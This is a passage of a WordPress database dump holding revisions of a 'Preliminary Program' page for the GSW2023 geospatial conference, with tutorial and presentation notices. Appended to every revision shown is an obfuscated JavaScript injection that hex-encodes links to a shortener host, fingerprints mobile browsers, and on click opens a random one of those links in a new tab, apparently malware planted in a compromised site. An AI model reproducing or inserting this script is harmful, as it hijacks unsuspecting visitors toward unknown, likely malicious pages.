|\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-05 09:33:55','2023-02-05 09:33:55','',2659,'https://gsw2023.com/?p=3791',0,'revision','',0),
(3792,1,'2023-02-05 09:38:42','2023-02-05 09:38:42','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\">Preliminary Program</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2672\" img_size=\"1224x511\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<p style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong>Tutorials</strong></span></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<p>&nbsp;</p>\n<p style=\"color: gray;\"><strong><span style=\"font-size: 14pt;\">Instruction for Oral Presentations</span></strong></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>More instructions will be announced once the program in complete in May 2023.</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Program','','inherit','closed','closed','','2669-revision-v1','','','2023-02-05 09:38:42','2023-02-05 09:38:42','',2669,'https://gsw2023.com/?p=3792',0,'revision','',0),
(3793,1,'2023-02-05 09:39:15','2023-02-05 09:39:15','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: left;\"><span style=\"font-size: 18pt;\">Preliminary Program</span></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2672\" img_size=\"1224x511\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<style>\n			.gap-10 {<br />				width:100%;<br />				height:20px;<br />			}<br />			.gap-50 {<br />				width:100%;<br />				height:50px;<br />			}<br />			.gap-100 {<br />				width:100%;<br />				height:130px;<br />			}<br />		</style>\n<div class=\"gap-10\"></div>\n<p style=\"color: gray;\"><span style=\"font-size: 14pt;\"><strong>Tutorials</strong></span></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>The GSW2023 will offer at least 4 tutorials on September 2, 2023. The tutorials will cover the state of the art and future trends in the Geospatial technologies and applications. The tutorial program will be announced soon.</li>\n</ul>\n</li>\n</ul>\n<div class=\"gap-50\"></div>\n<p>&nbsp;</p>\n<p style=\"color: gray;\"><strong><span style=\"font-size: 14pt;\">Instruction for Oral Presentations</span></strong></p>\n<ul class=\"nospace\">\n<li style=\"list-style-type: none;\">\n<ul class=\"nospace\">\n<li>More instructions will be announced once the program in complete in May 2023.</li>\n</ul>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][ultimate_info_table][/ultimate_info_table][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 